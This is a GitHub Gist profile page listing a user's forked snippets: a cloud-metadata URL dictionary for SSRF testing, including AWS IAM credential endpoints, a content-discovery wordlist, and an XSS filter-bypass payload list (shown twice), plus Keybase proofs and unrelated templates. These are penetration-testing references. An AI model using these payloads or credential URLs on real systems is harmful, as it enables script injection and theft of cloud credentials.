Skip to content

Instantly share code, notes, and snippets.

View ptkrm's full-sized avatar
💭
🚀can you hear me major tom🌘

ptkrm ptkrm

💭
🚀can you hear me major tom🌘
69 followers · 183 following
View GitHub Profile
@ptkrm
ptkrm / cloud_metadata.txt
Created October 21, 2021 15:18 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@ptkrm
ptkrm / keybase.md
Created July 14, 2020 04:04

Keybase proof

I hereby claim:

  • I am ptkrm on github.
  • I am ptkrm (https://keybase.io/ptkrm) on keybase.
  • I have a public key whose fingerprint is 38FC 953F 8DF4 3232 C76D E580 37A2 32B2 A228 2CCE

To claim this, I am signing this object:

@ptkrm
ptkrm / content_discovery_all.txt
Created March 6, 2020 23:59 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@ptkrm
ptkrm / xxsfilterbypass.lst
Created May 23, 2018 14:16 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@ptkrm
ptkrm / xxsfilterbypass.lst
Created May 23, 2018 14:16 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@ptkrm
ptkrm / keybase.md
Created November 27, 2016 19:34

Keybase proof

I hereby claim:

  • I am ptkrm on github.
  • I am ptkrm (https://keybase.io/ptkrm) on keybase.
  • I have a public key ASBvKwFfHul-KZhWhGMOt7Z6GBdTuZAyUljx1Pt02rcJQwo

To claim this, I am signing this object:

@ptkrm
ptkrm / sec_tutorial.md
Created November 24, 2016 18:34 — forked from tgrall/sec_tutorial.md
MongoDB Security Tutorial

#Simple MongoDB Security Tutorial

###1 - Start mongod without any "security option"

$ mongod --port 27017

@ptkrm
ptkrm / gist:4525057
Created January 13, 2013 17:01 — forked from nfrade/gist:4446653
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>HTML5 Template</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
</body>